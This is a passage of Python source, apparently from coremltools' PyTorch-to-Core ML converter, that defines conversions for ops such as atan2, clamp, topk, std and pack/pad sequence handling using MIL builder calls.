The result will be the second input\n # joined to the first input, either by list_write if an MIL list, or\n # append if a python list.\n inputs = _get_inputs(context, node, expected=2)\n ls = inputs[0]\n value = inputs[1]\n\n if isinstance(ls, list):\n context.add(ls + [value], node.name)\n elif isinstance(ls, ListVar):\n index = mb.list_length(ls=ls, name=node.name + \"_index\")\n res = mb.list_write(ls=ls, index=index, value=value, name=node.name)\n context.add(res)\n else:\n raise ValueError(\n \"can only append to Python list or MIL ListVar, got {}.\".format(\n type(inputs[0])\n )\n )\n\n\n@register_torch_op\ndef gather(context, node):\n inputs = _get_inputs(context, node)\n res = mb.gather_along_axis(x=inputs[0], indices=inputs[2], axis=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef index_select(context, node):\n x = context[node.inputs[0]]\n axis = context[node.inputs[1]]\n indices = context[node.inputs[2]]\n context.add(mb.gather(x=x, indices=indices, axis=axis, name=node.name))\n\n\n@register_torch_op(torch_alias=[\"abs\"])\ndef _abs(context, node):\n x = _get_inputs(context, node, expected=1)[0]\n if types.is_complex(x.dtype):\n context.add(mb.complex_abs(x=x, name=node.name))\n else:\n context.add(mb.abs(x=x, name=node.name))\n\n\n@register_torch_op\ndef repeat(context, node):\n x = context[node.inputs[0]]\n reps = context[node.inputs[1]]\n if isinstance(reps, list):\n reps = mb.concat(values=reps, axis=0)\n\n if reps.shape[0] > len(x.shape):\n x = mb.expand_dims(x=x, axes=list(range(reps.shape[0] - x.rank)))\n context.add(mb.tile(x=x, reps=reps, name=node.name))\n\n\n@register_torch_op\ndef repeat_interleave(context, node):\n \"\"\"\n For now, we only support scalar repeats + None or 0 dim\n \"\"\"\n x, repeats, dim, _ = _get_inputs(context, node, expected=4)\n\n repeats_val = repeats.val\n if isinstance(repeats_val, np.ndarray):\n repeats_val0 = np.expand_dims(repeats_val, 0).reshape(-1)[0]\n if np.any(repeats_val != repeats_val0):\n raise NotImplementedError(\n \"Conversion for torch.repeat_interleave with Tensor repeats has not been implemented\"\n )\n repeats_val = repeats_val0\n\n # This would operate on the flattened input tensor\n if dim is None:\n x = mb.reshape(x=x, shape=(-1,))\n else:\n if dim.val != 0:\n raise NotImplementedError(\n \"Conversion for torch.repeat_interleave with non-zero dim has not been implemented\"\n )\n\n \"\"\"\n on a high level:\n x\n | tile in dim 0\n v\n [x, x, ...]\n | reshape to split the repeats\n v\n [[x],\n [x],\n ...]\n | transpose(1, 0)\n V\n [x^T, x^T, ...]\n | flatten\n V\n result\n \"\"\"\n\n reps = [1] * x.rank\n reps[0] = repeats_val\n x_tiled = mb.tile(x=x, reps=reps)\n\n split_reps = [repeats_val] + list(x.shape)\n x_reshaped = mb.reshape(x=x_tiled, shape=list(split_reps))\n\n perm = [*range(x.rank + 1)]\n perm[0] = 1\n perm[1] = 0\n x_transposed = mb.transpose(x=x_reshaped, perm=perm)\n\n result_shape = list(x.shape)\n result_shape[0] = -1\n result = mb.reshape(x=x_transposed, shape=result_shape, name=node.name)\n\n context.add(result)\n\n\n@register_torch_op\ndef acos(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.acos(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef acosh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.acosh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef asin(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.asin(x=inputs[0], 
name=node.name))\n\n\n@register_torch_op\ndef atan(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.atan(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef atan2(context, node):\n \"\"\"\n atan2(Tensor y, Tensor x)\n Element-wise arctangent of y / x with consideration of the quadrant\n Returns a new tensor with the signed angles in radians between vector (x, y) and vector (1, 0)\n\n On a high level:\n 1. atan(y / x) to get the angle in [-pi / 2, pi / 2]\n 2. analyze quadrant to determine the angle in [-pi, pi]\n\n Reference PyTorch code https://gist.github.com/nikola-j/b5bb6b141b8d9920318677e1bba70466\n def my_atan2(y, x):\n pi = torch.from_numpy(np.array([np.pi])).to(y.device, y.dtype)\n ans = torch.atan(y / x)\n ans += ((y > 0) & (x < 0)) * pi\n ans -= ((y < 0) & (x < 0)) * pi\n ans *= (1 - ((y > 0) & (x == 0)) * 1.0)\n ans += ((y > 0) & (x == 0)) * (pi / 2)\n ans *= (1 - ((y < 0) & (x == 0)) * 1.0)\n ans += ((y < 0) & (x == 0)) * (-pi / 2)\n return ans\n \"\"\"\n inputs = _get_inputs(context, node, expected=2)\n y = inputs[0]\n x = inputs[1]\n if not types.is_float(y.dtype):\n y = mb.cast(x=y, dtype=\"fp32\")\n if not types.is_float(x.dtype):\n x = mb.cast(x=x, dtype=\"fp32\")\n\n # basic logical expressions\n y_less_0 = mb.less(x=y, y=0.0)\n y_greater_0 = mb.greater(x=y, y=0.0)\n x_less_0 = mb.less(x=x, y=0.0)\n x_equal_0 = mb.equal(x=x, y=0.0)\n\n # combined logical expressions\n ygreater0_and_xless0 = mb.logical_and(x=y_greater_0, y=x_less_0)\n yless0_and_xless0 = mb.logical_and(x=y_less_0, y=x_less_0)\n ygreater0_and_xequal0 = mb.logical_and(x=y_greater_0, y=x_equal_0)\n yless0_and_xequal0 = mb.logical_and(x=y_less_0, y=x_equal_0)\n\n # bool -> fp32 for numeric operation\n ygreater0_and_xless0_numeric = mb.cast(x=ygreater0_and_xless0, dtype=\"fp32\")\n yless0_and_xless0_numeric = mb.cast(x=yless0_and_xless0, dtype=\"fp32\")\n ygreater0_and_xequal0_numeric = mb.cast(x=ygreater0_and_xequal0, dtype=\"fp32\")\n yless0_and_xequal0_numeric = mb.cast(x=yless0_and_xequal0, dtype=\"fp32\")\n\n # quadrant modification coefficients\n coeff1 = mb.mul(x=ygreater0_and_xless0_numeric, y=_np.pi)\n coeff2 = mb.mul(x=yless0_and_xless0_numeric, y=_np.pi)\n coeff3 = mb.sub(x=1.0, y=ygreater0_and_xequal0_numeric)\n coeff4 = mb.mul(x=ygreater0_and_xequal0_numeric, y=_np.pi / 2.0)\n coeff5 = mb.sub(x=1.0, y=yless0_and_xequal0_numeric)\n coeff6 = mb.mul(x=yless0_and_xequal0_numeric, y=-_np.pi / 2.0)\n\n # if -1e-8 < x < 1e-8, x += 2e-8 to avoid y / 0\n # this shift makes atan2(0, 0) = 0, which is consistent with PyTorch torch.atan2\n x0left = mb.greater(x=x, y=-1e-8)\n x0right = mb.less(x=x, y=1e-8)\n x0 = mb.logical_and(x=x0left, y=x0right)\n x0numeric = mb.cast(x=x0, dtype=\"fp32\")\n safe_shift = mb.mul(x=x0numeric, y=2e-8)\n x_safe = mb.add(x=x, y=safe_shift)\n\n # compute atan(y / x)\n ydx = mb.real_div(x=y, y=x_safe)\n atan2_1 = mb.atan(x=ydx)\n\n # analyze quadrant\n atan2_2 = mb.add(x=atan2_1, y=coeff1)\n atan2_3 = mb.sub(x=atan2_2, y=coeff2)\n atan2_4 = mb.mul(x=atan2_3, y=coeff3)\n atan2_5 = mb.add(x=atan2_4, y=coeff4)\n atan2_6 = mb.mul(x=atan2_5, y=coeff5)\n context.add(mb.add(x=atan2_6, y=coeff6, name=node.name))\n\n\n@register_torch_op\ndef atanh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.atanh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef ceil(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.ceil(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef 
clamp(context, node):\n inputs = _get_inputs(context, node, expected=[1,2,3])\n x = inputs[0]\n min_val = inputs[1] if (len(inputs) > 1 and inputs[1]) else mb.const(val=_np.finfo(_np.float32).min)\n max_val = inputs[2] if (len(inputs) > 2 and inputs[2]) else mb.const(val=_np.finfo(_np.float32).max)\n\n if isinstance(min_val, Var) and isinstance(max_val, Var) and min_val.val >= max_val.val:\n # When min >= max, PyTorch sets all values to max.\n context.add(mb.fill(shape=mb.shape(x=x), value=max_val.val, name=node.name))\n return\n\n is_input_int = types.is_int(x.dtype)\n if not types.is_float(x.dtype):\n # The `mb.clip` op requires parameters from type domain ['fp16', 'fp32'].\n x = mb.cast(x=x, dtype=\"fp32\")\n x, min_val, max_val = promote_input_dtypes([x, min_val, max_val])\n if is_input_int:\n clip_res = mb.clip(x=x, alpha=min_val, beta=max_val)\n context.add(mb.cast(x=clip_res, dtype=\"int32\", name=node.name))\n else:\n context.add(mb.clip(x=x, alpha=min_val, beta=max_val, name=node.name))\n\n\n@register_torch_op\ndef triu(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n diagonal = inputs[1]\n diagonal = 0 if diagonal is None else diagonal.val\n if diagonal <= 0:\n res = mb.band_part(x=x, lower=-diagonal, upper=-1, name=node.name)\n else:\n y = mb.band_part(x=x, lower=-1, upper=diagonal - 1)\n res = mb.sub(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef tril(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n diagonal = inputs[1]\n diagonal = 0 if diagonal is None else diagonal.val\n if diagonal >= 0:\n res = mb.band_part(x=x, lower=-1, upper=diagonal, name=node.name)\n else:\n y = mb.band_part(x=x, lower=-diagonal - 1, upper=-1)\n res = mb.sub(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef cos(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.cos(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef cosh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.cosh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef exp(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.exp(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef exp2(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.exp2(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef floor(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.floor(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef reciprocal(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.inverse(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef log(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n if types.is_int(x.dtype):\n x = mb.cast(x=x, dtype=\"fp32\")\n context.add(mb.log(x=x, name=node.name))\n\n\n@register_torch_op(torch_alias=[\"round\"])\ndef _round(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.round(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef rsqrt(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.rsqrt(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef sin(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.sin(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef sinh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n 
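# --- Editor's note: illustrative sketch, not part of the original coremltools source. ---\n # `triu`/`tril` above handle the off-diagonal cases with `band_part` plus a subtraction, e.g.\n # triu(x, d) for d > 0 becomes x - band_part(x, lower=-1, upper=d-1), i.e. x - tril(x, d-1)\n # in numpy terms. A quick check (hypothetical values, illustration only):\n # import numpy as np\n # x = np.arange(16).reshape(4, 4)\n # assert (np.triu(x, 2) == x - np.tril(x, 1)).all()\n 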
context.add(mb.sinh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef asinh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.asinh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef sqrt(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.sqrt(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef square(context, node):\n inputs = _get_inputs(context, node, expected=1)\n # mb.square is not supported in some backend\n context.add(mb.mul(x=inputs[0], y=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef tan(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.tan(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef tanh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.tanh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef threshold(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n alpha = inputs[1]\n threshold_val = inputs[2]\n\n # Simple case (threshold_val == alpha)\n if alpha.val == threshold_val.val:\n threshold_node = mb.threshold(x=x, alpha=alpha, name=node.name)\n context.add(threshold_node)\n return\n\n # Complex case (threshold_val != alpha); a commented numeric check of this decomposition appears below\n threshold_node = mb.threshold(x=x, alpha=alpha, name=node.name + '_threshold')\n context.add(threshold_node)\n\n gt_node = mb.greater_equal(x=alpha, y=x, name=node.name + '_ge')\n context.add(gt_node)\n gt_node_32 = mb.cast(x=gt_node, dtype=\"fp32\", name=node.name + '_ge32')\n\n mul_node = mb.linear_activation(\n x=gt_node_32,\n alpha=float(threshold_val.val - alpha.val),\n beta=0.,\n name=node.name + '_mul'\n )\n context.add(mul_node)\n\n final_node = mb.add(x=mul_node, y=threshold_node, name=node.name)\n context.add(final_node)\n\n\n@register_torch_op\ndef sign(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.sign(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef is_floating_point(context, node):\n inputs = _get_inputs(context, node, expected=1)\n is_float = types.is_float(inputs[0].dtype)\n context.add(mb.const(val=is_float, name=node.name))\n\n\n@register_torch_op\ndef logical_and(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = inputs\n x = mb.cast(x=x, dtype=\"bool\")\n y = mb.cast(x=y, dtype=\"bool\")\n context.add(mb.logical_and(x=x, y=y, name=node.name))\n\n@register_torch_op\ndef logical_or(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = inputs\n x = mb.cast(x=x, dtype=\"bool\")\n y = mb.cast(x=y, dtype=\"bool\")\n context.add(mb.logical_or(x=x, y=y, name=node.name))\n\n\n@register_torch_op\ndef logical_xor(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = inputs\n x = mb.cast(x=x, dtype=\"bool\")\n y = mb.cast(x=y, dtype=\"bool\")\n context.add(mb.logical_xor(x=x, y=y, name=node.name))\n\n\ndef _nonzero_as_tuple(context, node, x):\n '''\n Calculates the non-zero elements of x then slices results by each inner index.\n '''\n non_zero = mb.non_zero(x=x)\n\n result = []\n for i in range(x.rank):\n result.append(\n mb.slice_by_index(\n x=non_zero,\n begin=[0, i],\n end=[-1, -1], # Ignored, but required\n end_mask=[True, False],\n squeeze_mask=[False, True]\n )\n )\n\n context.add(result, node.name)\n\n\n@register_torch_op\ndef where(context, node):\n inputs = _get_inputs(context, node)\n\n if len(inputs) == 1:\n _nonzero_as_tuple(context, node, inputs[0])\n return\n\n assert len(inputs) == 3\n cond = inputs[0]\n 
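# --- Editor's note: illustrative sketch, not part of the original coremltools source. ---\n # Numeric check of the `threshold` decomposition above: torch.nn.functional.threshold(x, alpha, value)\n # equals max(x, alpha) + (x <= alpha) * (value - alpha). (Hypothetical values, illustration only.)\n # import numpy as np\n # x, alpha, value = np.array([-2.0, 0.5, 3.0]), 1.0, 7.0\n # composite = np.maximum(x, alpha) + (x <= alpha) * (value - alpha)\n # assert (composite == np.where(x > alpha, x, value)).all() # -> array([7., 7., 3.])\n 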
if not types.is_bool(cond.dtype):\n # cond must be bool type\n cond = mb.cast(x=cond, dtype=\"bool\")\n if not any([any_symbolic(x.shape) for x in inputs[:3]]):\n # broadcast all tensors to the same shape\n broadcast_inputs = _broadcast_tensors([cond, inputs[1], inputs[2]])\n result = mb.select(\n cond=broadcast_inputs[0],\n a=broadcast_inputs[1],\n b=broadcast_inputs[2],\n name=node.name,\n )\n else:\n result = mb.select(cond=cond, a=inputs[1], b=inputs[2], name=node.name)\n context.add(result)\n\n\n@register_torch_op\ndef nonzero_numpy(context, node):\n inputs = _get_inputs(context, node, expected=1)\n _nonzero_as_tuple(context, node, inputs[0])\n\n\n@register_torch_op\ndef neg(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x, y = promote_input_dtypes([inputs[0], -1])\n context.add(mb.mul(x=x, y=y, name=node.name))\n\n@register_torch_op\ndef topk(context, node):\n def dynamic_topk(x, k, axis, ascending):\n assert k.val is None, \"Please use mb.topk directly if k is compile time known\"\n indices = mb.argsort(x=x, axis=axis, ascending=ascending)\n values = mb.gather_along_axis(x=x, indices=indices, axis=axis)\n\n k_indices = mb.range_1d(end=k, start=0, step=1)\n values = mb.gather(x=values, indices=k_indices, axis=axis)\n indices = mb.gather(x=indices, indices=k_indices, axis=axis)\n\n return values, indices\n\n inputs = _get_inputs(context, node)\n kwargs = {\"name\": node.name, \"x\": inputs[0], \"k\": inputs[1]}\n\n if len(inputs) > 6:\n raise Exception(\"Number of inputs to topk exceeds 6\")\n # optional: @axis\n if len(inputs) > 2:\n if inputs[2] is not None:\n kwargs[\"axis\"] = inputs[2].val\n\n # optional: @ascending\n if len(inputs) > 3:\n largest = inputs[3].val\n kwargs[\"ascending\"] = not largest\n\n # last inputs to topk are optional - sorted and out.\n sort = True\n if len(inputs) > 4:\n if inputs[4].val is False and not is_current_opset_version_compatible_with(target.iOS16):\n raise Exception(\"For opset <= iOS16, only sorted=True supported for the topk\")\n sort = inputs[4].val\n\n if len(inputs) > 5:\n if inputs[5] is not None:\n raise Exception(\n \"Unsupported value for argument 'out' in topk. 
Supported values: None, but input \"\n \"is {}\".format(inputs[5].val)\n )\n\n if is_current_opset_version_compatible_with(target.iOS16):\n kwargs[\"sort\"] = sort\n\n if kwargs[\"k\"].val is None:\n res = dynamic_topk(\n x=kwargs[\"x\"],\n k=kwargs[\"k\"],\n axis=kwargs[\"axis\"],\n ascending=kwargs[\"ascending\"]\n )\n else:\n res = mb.topk(**kwargs)\n\n values_name = node.outputs[0]\n indices_name = node.outputs[1]\n context.add(res[0], torch_name=values_name)\n context.add(res[1], torch_name=indices_name)\n\n\ndef _std(x, axes, keep_dim, unbiased, eps):\n need_rescale = False\n if unbiased:\n # If \"unbiased\" is True,\n # then we need to divide by \"N-1\" (instead of \"N\") to compute the mean of (x-E[x])^2\n # for an unbiased estimate of the variance / standard deviation.\n # In the sequence of MIL ops added below, we first compute the mean using \"N\", and only if it's unbiased\n # do we rescale the final result later.\n # We ignore the \"unbiased\" flag if any of the dimensions involved in this operation are dynamic\n # (we could have still handled that case by using \"get_shape\" etc ops, but we don't do that here,\n # trading numerical accuracy for performance)\n if axes is None:\n if not any_symbolic(x.shape) and _np.prod(x.shape) > 1:\n N = _np.prod(x.shape)\n need_rescale = True\n else:\n dims = []\n # collect dimensions corresponding to \"axes\"\n for axis in axes:\n dims.append(x.shape[axis])\n if all([not is_symbolic(s) for s in dims]):\n N = _np.prod(dims)\n if N > 1:\n need_rescale = True\n if need_rescale:\n rescale_factor = _np.sqrt(N / float(N - 1))\n\n x_mean = mb.reduce_mean(x=x, axes=axes, keep_dims=True)\n x_demeaned = mb.sub(x=x, y=x_mean)\n x_demeaned_square = mb.square(x=x_demeaned)\n x_demeaned_square_mean = mb.reduce_mean(x=x_demeaned_square, axes=axes, keep_dims=keep_dim)\n if eps > 0:\n x_demeaned_square_mean = mb.add(x=x_demeaned_square_mean, y=eps)\n if need_rescale:\n y_before_scale = mb.sqrt(x=x_demeaned_square_mean)\n y = mb.mul(x=y_before_scale, y=rescale_factor)\n else:\n y = mb.sqrt(x=x_demeaned_square_mean)\n return y\n\n@register_torch_op\ndef numel(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n x = mb.shape(x=x)\n x = mb.reduce_prod(x=x, axes=[0], name=node.name)\n context.add(x)\n\n@register_torch_op\ndef std(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n if not (len(inputs) == 2 or len(inputs) == 4):\n raise ValueError(\"Number of inputs to the 'std' op must be 2 or 4\")\n\n keep_dim = False\n axes = None\n if len(inputs) == 2:\n unbiased = inputs[1].val\n if len(inputs) == 4:\n axes = inputs[1].val\n if isinstance(axes, int):\n axes = [axes]\n unbiased = inputs[2].val\n keep_dim = inputs[3].val\n\n y = _std(x, axes, keep_dim, unbiased, 0)\n context.add(y, node.name)\n\n\n@register_torch_op\ndef copy(context, node):\n inputs = _get_inputs(context, node, expected=[2, 3])\n context.add(mb.identity(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef dtype(context, node):\n inputs = _get_inputs(context, node, expected=1)\n dtype_str = inputs[0].dtype.__name__\n context.add(mb.const(val=dtype_str, name=node.name))\n\n\n@register_torch_op\ndef tensor(context, node):\n def _make_tensor(list_of_tensor, name, rank):\n if rank == 6:\n raise NotImplementedError(\"Core ML only supports tensor rank <= 5.\")\n if not isinstance(list_of_tensor, list):\n return list_of_tensor\n values = [\n _make_tensor(x, name + \"_r_\" + str(i), rank + 1)\n for i, x in enumerate(list_of_tensor)\n ]\n if 
len(values) == 1:\n return mb.expand_dims(x=values[0], axes=[0], name=name)\n return mb.stack(values=values, axis=0, name=name)\n\n inputs = _get_inputs(context, node, expected=4)\n\n # Case 1: Using torch.tensor to create a const tensor\n # For example:\n # torch.tensor([[[0, 0], [0, 10], [5, 10], [5, 0]]], dtype=torch.float32)\n val = inputs[0]\n if isinstance(val, list):\n context.add(_make_tensor(val, node.name, 1))\n return\n\n if inputs[2] is None:\n context.add(mb.identity(x=val, name=node.name))\n return\n\n # Case 2: Create a tensor filled with a single value\n val = val.val # element val to fill\n msg_prefix = 'torch::tensor {} '.format(node.name)\n if val is None:\n raise ValueError(msg_prefix + 'val is None')\n dtype_str = inputs[1].val\n if dtype_str != \"fp32\":\n raise NotImplementedError(\n msg_prefix + \"Unsupported dtype: {}\".format(dtype_str)\n )\n # inputs[3] is a bool (not sure what it is)\n shape = mb.shape(x=inputs[2], name=node.name + \"_shape\")\n context.add(mb.fill(shape=shape, value=val, name=node.name))\n\n\n\"\"\"\nPack and unpack op in pytorch.\nThe typical pattern is as following\n\n>>> seq = torch.tensor([[1,2,0], [3,0,0], [4,5,6]])\n>>> lens = [2, 1, 3]\n>>> packed = pack_padded_sequence(seq, lens, batch_first=True, enforce_sorted=False)\n>>> packed\nPackedSequence(data=tensor([4, 1, 3, 5, 2, 6]), batch_sizes=tensor([3, 2, 1]),\n sorted_indices=tensor([2, 0, 1]), unsorted_indices=tensor([1, 2, 0]))\n>>> seq_unpacked, lens_unpacked = pad_packed_sequence(packed, batch_first=True)\n>>> seq_unpacked\ntensor([[1, 2, 0],\n [3, 0, 0],\n [4, 5, 6]])\n>>> lens_unpacked\ntensor([2, 1, 3])\n\nsource from https://pytorch.org/docs/stable/generated/torch.nn.utils.rnn.pad_packed_sequence.html\n\"\"\"\n\n\n@register_torch_op\ndef _pack_padded_sequence(context, node):\n # The implementation of this op is not efficient. Raise a warning.\n logger.warning(\n \"Encountered a _pack_padded_sequence layer. The implementation of translating pack/unpack op\\\n in pytorch is not efficient due to the current limitation of Core ML. Removing the pack-unpack logic \\\n and use a fixed batch size model is recommended.\"\n )\n\n inputs = _get_inputs(context, node, expected=3)\n tensor_name, batch_sizes_name = node.outputs\n tensor_input = inputs[0]\n batch_sizes = inputs[1]\n batch_first = inputs[2].val\n\n # by assuming that the output of this op is always feed in lstm layer,\n # we enforce the layout to be Batch * seq_length * Feature.\n if not batch_first:\n tensor_input = mb.transpose(x=tensor_input, perm=[1, 0, 2])\n context.add(mb.identity(x=tensor_input, name=tensor_name))\n\n # add the batch_sizes in the context, so that _pad_packed_sequence can\n # find it later.\n context.add(mb.identity(x=batch_sizes, name=batch_sizes_name))\n\n\n@register_torch_op\ndef _pad_packed_sequence(context, node):\n # The implementation of this op is not efficient. Raise a warning.\n logger.warning(\n \"Encountered a _pad_packed_sequence layer. The implementation of translating pack/unpack op\\\n in pytorch is not efficient due to the current limitation of Core ML. 
Removing the pack-unpack logic \\\n and use a fixed batch size model is recommended.\"\n )\n inputs = _get_inputs(context, node)\n\n # seq_lengths denotes the actual sequence length for each batch.\n # pad denotes the padding value for those data which has shorter length.\n input_tensor = inputs[0]\n seq_lengths = inputs[1]\n batch_first = inputs[2].val\n pad = inputs[3].val\n\n # we only support pack and unpack translation for static tensor shape,\n # i.e., the three dimensions are all known during compile time.\n if any([is_symbolic(x) for x in input_tensor.shape]):\n raise NotImplementedError(\"Only static shape of PackedSequence object is supported.\")\n\n # the input always has batch first layout.\n # padded_seq_len denotes the maximum sequence length across batches.\n batch, padded_seq_len, input_dim = input_tensor.shape\n assert seq_lengths.rank == 1\n assert batch == seq_lengths.shape[0]\n\n # we iterate through the batch, pad each data, and concate them into a single tensor in the end,\n # which is the total_tensor here.\n # Say the input_tensor has shape [batch , padded_seq_len, input_dim],\n # and the seq_lengths = [len_1, len_2, len_3].\n # Note that in pytorch, the seq_lengths must be decreasing in order, len_1 >= len_2 >= len_3.\n total_tensor = []\n\n for i in range(batch):\n # slice for each data\n # x has shape [padded_seq_len, input_dim]\n x = mb.slice_by_index(\n x=input_tensor,\n begin=[i, 0, 0],\n end=[0, 0, 0],\n stride=[1, 1, 1],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n squeeze_mask=[True, False, False],\n )\n\n # get the unpadded sequence,\n # if the unpadded sequence has length seq_length,\n # x would have shape [seq_length, input_dim].\n # For example, the first data would result in a [len_1, input_dim] tensor.\n seq_length = mb.cast(x=value_at(seq_lengths, i), dtype=\"int32\")\n concate_values = [seq_length, input_dim]\n end_index = mb.concat(values=concate_values, axis=0)\n x = mb.slice_by_index(\n x=x,\n begin=[0, 0],\n end=end_index,\n stride=[1, 1],\n begin_mask=[True, True],\n end_mask=[False, True],\n )\n\n # get the padding part of the data\n # Note that we always add one dummy padding in the end with shape [padded_seq_len - seq_length + 1, input_dim].\n # The reason is that for the case when seq_length = padded_seq_len,\n # coreml cannot handle the empty tensor.\n pad_length = mb.sub(x=padded_seq_len + 1, y=seq_length)\n concate_values = [pad_length, input_dim]\n shape = mb.concat(values=concate_values, axis=0)\n pad_values = mb.fill(shape=shape, value=pad)\n\n # concate the unpadded sequence and the padding data\n # the resulting tensor would have shape [padded_seq_len + 1, input_dim]\n x, pad_values = promote_input_dtypes([x, pad_values])\n concate_values = [x, pad_values]\n add_values = mb.concat(values=concate_values, axis=0)\n\n # trim the dummy padding tensor\n # the output would have shape [padded_seq_len, input_dim]\n x = mb.slice_by_index(\n x=add_values,\n begin=[0, 0],\n end=[padded_seq_len, 0],\n stride=[1, 1],\n begin_mask=[True, True],\n end_mask=[False, True],\n )\n\n # add it to total tensor\n total_tensor.append(x)\n\n # transpose the tensor if batch_first = False\n if not batch_first:\n x = mb.stack(values=total_tensor, axis=0)\n x = mb.transpose(x=x, perm=[1, 0, 2], name=node.name)\n else:\n x = mb.stack(values=total_tensor, axis=0, name=node.name)\n\n context.add(x)\n\n\n@register_torch_op\ndef log10(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n log_x = mb.log(x=x)\n 
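# change of base: log10(x) = ln(x) / ln(10), hence the constant multiplier 1 / ln(10) below\n 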
context.add(mb.mul(x=log_x, y=1 / _np.log(10.0)), node.name)\n\n\n@register_torch_op\ndef log2(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n log_x = mb.log(x=x)\n context.add(mb.mul(x=log_x, y=1 / _np.log(2.0)), node.name)\n\n\n@register_torch_op\ndef flip(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = mb.reverse(x=inputs[0], axes=inputs[1], name=node.name)\n context.add(x, node.name)\n\n\n@register_torch_op(torch_alias=[\"reflection_pad1d\"])\ndef reflection_pad2d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n torch_pad = inputs[1].val\n pad_flipped = torch_pad.reshape((-1, 2))[::-1].ravel()\n pad = _np.pad(pad_flipped, (len(x.shape) * 2 - len(pad_flipped), 0))\n context.add(mb.pad(x=x, pad=pad, mode='reflect'), node.name)\n\n\n@register_torch_op(torch_alias=[\"replication_pad1d\"])\ndef replication_pad2d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n torch_pad = inputs[1].val\n pad_flipped = torch_pad.reshape((-1, 2))[::-1].ravel()\n pad = _np.pad(pad_flipped, (len(x.shape) * 2 - len(pad_flipped), 0))\n context.add(mb.pad(x=x, pad=pad, mode='replicate'), node.name)\n\n\ndef _broadcast_tensors(tensors):\n def _solve_broadcast_shape(shapes):\n rank = _np.max([len(shape) for shape in shapes])\n shapes = [[1] * (rank - len(shape)) + shape for shape in shapes]\n result_shape = []\n for i in range(rank):\n dims = [shapes[j][i] for j in range(len(tensors))]\n if any_symbolic(dims):\n # rdar://85559497 (Handle dynamic shapes inputs broadcast for pytorch)\n raise NotImplementedError(\n \"Only static shaped inputs are supported for torch.broadcast_tensors conversion.\"\n )\n result_shape.append(_np.max(dims))\n return result_shape\n\n if len(tensors) == 1:\n return tensors\n\n # solve the broadcast shape\n input_shapes = [list(x.shape) for x in tensors]\n broadcast_shape = _solve_broadcast_shape(input_shapes)\n\n # do the broadcasting\n results = []\n for tensor in tensors:\n name = tensor.name + \"_after_broadcast\"\n results.append(_broadcast(name, tensor, broadcast_shape))\n return results\n\n\n@register_torch_op\ndef broadcast_tensors(context, node):\n inputs = _get_inputs(context, node)\n context.add(_broadcast_tensors(inputs[0]), node.name)\n\n\ndef _scatter(context, inputs, mode, name):\n data = inputs[0]\n axis = inputs[1].val\n indices = inputs[2]\n updates = inputs[3]\n if types.is_scalar(updates.sym_type):\n updates = mb.fill(shape=indices.shape, value=updates.val, name=name)\n result = mb.scatter_along_axis(data=data, indices=indices, updates=updates,\n axis=axis, 